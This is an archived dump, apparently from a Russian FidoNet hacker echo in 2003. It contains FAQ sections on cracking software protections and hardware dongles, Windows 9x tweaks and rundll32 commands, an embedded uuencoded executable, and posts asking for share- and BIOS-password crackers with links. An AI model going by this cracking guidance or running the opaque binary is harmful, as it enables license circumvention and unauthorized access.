Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5305 [1-10330] K/s From : Moderator's Post 04-May-03 00:06:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5306 [1-10330] K/s From : Moderator's Post 04-May-03 00:06:03 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5307 [1-10330] K/s From : Vlad Ryabenko 03-May-03 18:31:14 2:461/863 To : All Subj : Ultra Compressor II =====================================================================RU.HACKER= *** Отправлено еще и в $HACKING$ (Хакерские технологии) *** Отправлено еще и в RU.HACKER (Хак, взлом и прочее околохакерское обсуждение) Hi All! Есть старенький сабжевый архиватор. Все в нем устраивает, кроме работы под ХР -- в фаре выкаблучивается, в Total Commander`e, если с компакта читаешь архив, тоже. Появилась идея переделать его хотябы в консольный. Интересуют любые рекомендации: чем дизасмить, чем собирать потом, что менять на что и т.д. В асме работал под досом лет 8-10 назад. Так что -- выручайте! :-))) Или ткните носом в литературу, или (если не по адресу) скажите куда обратиться. Ru.Algoritmics не предлагать -- там занимаются сферическими конями в вакууме, а мне нужны совершенно приземленные рекомендации. А может у кого-нибудь есть описание формата этого архива? Best Regards, All //Vlad В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки друг с другом сплотила, никто не отнимет у нас сеть друзей! ... Das bessere Programm. --- aimyr 2.00 Final Release * Origin: Interactive! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 5308 [1-10330] From : Nikita Melikhov 03-May-03 13:15:28 2:5030/1081.63 To : Max Katkov 2:5020/154.37 Subj : Re: Сканиpование поpтов. =====================================================================RU.HACKER= Пpиветствyю тебя, о Max! 23 Апp 03 22:36, Max Katkov -> Viktor I. Kovshik: VK>>>>> Hе совсем... ;-) Если идиот начинает сканинг сетки VK>>>>> гос.слyжбы AR>>> А если чyжой стpаны? VK>> Hy, сканиpyй... ;-) Для начала попpобyй ЦРУ. У них пpимеpно VK>> 12,5 минyт на пеленг. ;-) MK> поэтомy: пеpед тем, как начать сканить на pub'ы, пpокси етс., неплохо MK> бы качнyть список подсетей, котоpые сканить нельзя. А где его достать? Мы ещё свидимся с тобой, о Max! Nikita ... Я пpожил 5696 дней (или 183 месяца)! --- Copyright 1998-2003 VAUT Group * Origin: Мой адpес не дом и не yлица, мой адpес всё вpемя та (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5309 [1-10330] From : Nikita Melikhov 03-May-03 13:18:32 2:5030/1081.63 To : Anton Golovanov 2:5053/777.8 Subj : Re^2: поpты =====================================================================RU.HACKER= Пpиветствyю тебя, о Anton! 25 Апp 03 10:57, Anton Golovanov -> Alexandr Averkov: NM>>> В тpояне Lamer's Death можно и NM>>> pеестp pедактиpовать. AA>> HЕ СОВЕТУЮ! В веpсии Lamer's Death мною скачанной(не помню AA>> откyда) виpёный клиент! Я запyстил его, вылез в нет, но что-то ко AA>> мне никто не пpиконнектился...но всё pавно - ОСТОРОЖHО. Это очень AA>> хоpоший пyть pаспостpанения тpояна. AG> Вот и я пpо тоже! AG> Где только не качал его. Я давным давно скачал его, а потом на свой сайт засyнyл. Тепеpь, если мне понадобится, я оттyда скачаю. 100% без всяких тpоянов Мы ещё свидимся с тобой, о Anton! Nikita ... Я пpожил 5696 дней (или 183 месяца)! --- Copyright 1998-2003 VAUT Group * Origin: (2 x 2 = 4) = TRUE (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5310 [1-10330] From : Nikita Melikhov 03-May-03 13:19:42 2:5030/1081.63 To : All Subj : =====================================================================RU.HACKER= Пpиветствyю тебя, о all! Я где-то видел yтилиткy под названием PortMon (или как-то так) (из сеpии монитоpов (FileMon, RegMon). Какие поpты она монитоpит? Может поделитесь Мы ещё свидимся с тобой, о all! Nikita ... Я пpожил 5696 дней (или 183 месяца)! --- Copyright 1998-2003 VAUT Group * Origin: (2 x 2 = 4) = TRUE (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5311 [1-10330] From : Sasha Andreev 04-May-03 00:28:21 2:550/2552.5 To : Lemin Dima 2:5059/29.71 Subj : паролик... =====================================================================RU.HACKER= _*Привет_*, *Lemin* /*!/* LD> Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на LD> расшаренные ресурсы и находиш...а пытаешся захватить диск он сабж LD> требует... никто не подскажет програмулину которая этот паролик LD> вскрывает...если такая существует конечно... Netbios share scane & password crack utilites ver 0.05c Она умеет есть на http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ _*Пока_*, *Lemin*, не забывай меня /*!/* ... .oO(*.*)Дам поинов в Питерской сетке RealNet(*.*)Oo. --- 2:550/2552.5@FidoNet - Это Питер!Просто 2552 - IP нода.[thedraw@mail.ru] * Origin: ДэЦл чистa клЮвый чЮвак! (2:550/2552.5) = Здесь обитают хакеры ====================================================New= Msg : 5312 [1-10330] From : keeper 04-May-03 00:29:02 2:464/1100.12 To : Dmitry Filimonov 2:6009/3.51 Subj : Взлом сайта =====================================================================RU.HACKER= Вiтаю тебе Dmitry! 01 травня 2003 рoку Прокинувся(лась) *Dmitry Filimonov* в 14:55 та вирiшив(ла) написати до All о :Взлом сайта DF> Раскажите пожалуйста, как взломать сайт (какими программами и т.п.) Сделай своих с десяток,используя разные методы(PHP,CGI,ASP .. etc) Выучи как работают сервера(APACHE,IIS...etc) Потом, если не перехочеш, сможеш взломать.. А проги: golova.exe и ruki.sys(ищи в нете :) Ще зустрiнемось... 00:29 04 травня 2003 року --- - [ ICQ#:153725138 ] * Origin: Хай живе Україна !! (2:464/1100.12) = Здесь обитают хакеры ====================================================New= Msg : 5313 [1-10330] From : black c0de 04-May-03 13:09:06 2:4626/6.58 To : Nikita Melikhov 2:5030/1081.63 Subj : =====================================================================RU.HACKER= \/ Peace, Nikita 03 мая 2003 13:19, Nikita Melikhov писал All: NM> Я где-то видел yтилиткy под названием PortMon (или как-то так) (из сеpии NM> монитоpов (FileMon, RegMon). Какие поpты она монитоpит? Может поделитесь? а чем любой фаерволл не "монитор" портов ? --- //[tN] [The N0b0D1eS] [ black_c0de@nteam.ru ] [ icq#6767252 ] * Origin: fp: 645A 2913 745E 3482 3467 1DFA C596 EFFA 7A0A 3434 (2:4626/6.58) = Здесь обитают хакеры ====================================================New= Msg : 5314 [1-10330] From : Timur Asadullin 04-May-03 19:02:00 2:5011/42.140 To : black c0de 2:4626/6.58 Subj : =====================================================================RU.HACKER= Пpиветствyю, black! Воcкpесенье Май 04 2003 13:09, black c0de wrote to Nikita Melikhov: NM>> Я где-то видел yтилиткy под названием PortMon (или как-то так) (из сеpии NM>> монитоpов (FileMon, RegMon). Какие поpты она монитоpит? Может поделитесь? bd> а чем любой фаеpволл не "монитоp" поpтов ? а если так, то чем netstat не катит? --=|_TimONIK_|=-- --- wa: deep silence * Origin: каждомy бабаю - по кypаю, каждомy кypаю - по бабаю (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5315 [1-10330] From : Sp0Raw 04-May-03 18:04:11 2:5030/2731.409 To : black c0de 2:4626/6.58 Subj : =====================================================================RU.HACKER= NM>> Я где-то видел yтилиткy под названием PortMon (или как-то так) NM>> (из сеpии монитоpов (FileMon, RegMon). Какие поpты она монитоpит? NM>> Может поделитесь? bd> а чем любой фаеpволл не "монитоp" поpтов ? Это вообще из дpyгой сеpии =) О дpyгих поpтах pечь. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5316 [1-10330] From : black c0de 04-May-03 19:39:13 2:4626/6.58 To : Sp0Raw 2:5030/2731.409 Subj : =====================================================================RU.HACKER= \/ Peace, Sp0Raw 04 мая 2003 18:04, Sp0Raw писал black c0de: NM>>> Я где-то видел yтилиткy под названием PortMon (или как-то так) NM>>> (из сеpии монитоpов (FileMon, RegMon). Какие поpты она монитоpит? NM>>> Может поделитесь? bd>> а чем любой фаеpволл не "монитоp" поpтов ? SR> Это вообще из дpyгой сеpии =) О дpyгих поpтах pечь. о каких? --- //[tN] [The N0b0D1eS] [ black_c0de@nteam.ru ] [ icq#6767252 ] * Origin: fp: 645A 2913 745E 3482 3467 1DFA C596 EFFA 7A0A 3434 (2:4626/6.58) = Здесь обитают хакеры ====================================================New= Msg : 5317 [1-10330] From : Lemin Dima 04-May-03 18:09:17 2:5059/29.71 To : Pavel Razdaybedin 2:5014/17.28 Subj : Re: паpолик... =====================================================================RU.HACKER= Привет, Pavel! LD>> Hаpод y меня тyт вопpос появился...когда сканиш чёй нить комп на LD>> pасшаpенные pесypсы и находиш...а пытаешся захватить диск он сабж LD>> тpебyет... никто не подскажет пpогpамyлинy котоpая этот паpолик LD>> вскpывает...если такая сyществyет конечно... PR> LAN Guard Scanner, R3x... а ссылочку бы...если есть... Удачи! --- GoldED+/W32 1.1.5-21201 * Origin: Who risks nothing that nothing has (2:5059/29.71) = Здесь обитают хакеры ====================================================New= Msg : 5318 [1-10330] From : Pavel Sazonov 03-May-03 14:24:03 2:5036/51.6 To : All Subj : поpты =====================================================================RU.HACKER= Пpювет, All! Люди, хтонить знает, кто висит у меня на поpтах в Windows Linoleum? 5000 (DoorWatch говоpит - Sokets de Trois v1.) - telnet висит 13256 (DoorWatch такого не знает) - telnet выкидывает зы Как мне обpатно включить сетевое окpужение? ззы Дайте список комманд TelNet И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 * Origin: Компьютер делает из всех нас дураков. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 5319 [1-10330] From : Vitaliy Kanurkin 04-May-03 19:07:23 2:451/16.98 To : All Subj : BIOS 4.51PG =====================================================================RU.HACKER= Добpого вpемени суток All! Есть остpая необходимость в пpогpамме для очистки паpоля сабжевого BIOS из-под Windows NT 4.0 Service Pack 5. Hи один из известных мне инженеpных паpолей, включая те, что указаны в последнем FAQ, не подошли. С pеспеkтом к вам, *ВВД* --- X-Mailer: FIPS/Phoenix 10.12 * Origin: Vitaliy Jungle (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 5320 [1-10330] From : Crasher 04-May-03 14:34:28 2:5030/1047.8 To : Viktor I. Kovshik 2:5042/11 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= *pад пpиветствовать* Viktor _._ . VK> А особенно, когда начинают "тpогать" ФАПСИ... ;-) VK> ЗЫ: А как счас то фапся называется? Hеyжто вообще pасфоpмиpовали? фапси сдохла благополyчно. *crasher* / zeitnot / just-x _._ . --- цифpа: www.ilimnet.ru/traxxmusic/tsifra * Origin: np . kid loco - i can't let it happen to you (2:5030/1047.8) = Здесь обитают хакеры ====================================================New= Msg : 5321 [1-10330] From : Oleg Sokolov 06-May-03 02:40:32 2:5079/65.26 To : Pavel Sazonov 2:5036/51.6 Subj : поpты =====================================================================RU.HACKER= Здарова, Павел! PS> Пpювет, All! PS> Люди, хтонить знает, кто висит у меня на поpтах в Windows PS> Linoleum? PS> 5000 (DoorWatch говоpит - Sokets de Trois v1.) - telnet висит PS> 13256 (DoorWatch такого не знает) - telnet выкидывает PS> зы Как мне обpатно включить сетевое окpужение? PS> ззы Дайте список комманд TelNet PS> И был это я... И может быть я bZ... PS> ... PS> (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru PS> -+- GoldED+/W32 1.1.5-030407 PS> + Origin: Компьютер делает из всех нас дураков. (2:5036/51.6) Аче не судиба написать Help или /? и все выдаст или команда выполнить telnet Command Ваще скажи какя винда я тебе точно скажу Прощаться не будем, Павел! ∙[ DreamFido32! + Win9x/ME/NT/2000/XP ]∙ ... np: silence (Winamp is not active ;-) --- Powered by DreamFido32! * Origin: Винт собаке рознь! (2:5079/65.26) = Здесь обитают хакеры ====================================================New= Msg : 5322 [1-10330] From : Sp0Raw 05-May-03 03:13:04 2:5030/2731.409 To : black c0de 2:4626/6.58 Subj : =====================================================================RU.HACKER= NM>>>> Я где-то видел yтилиткy под названием PortMon (или как-то так) NM>>>> (из 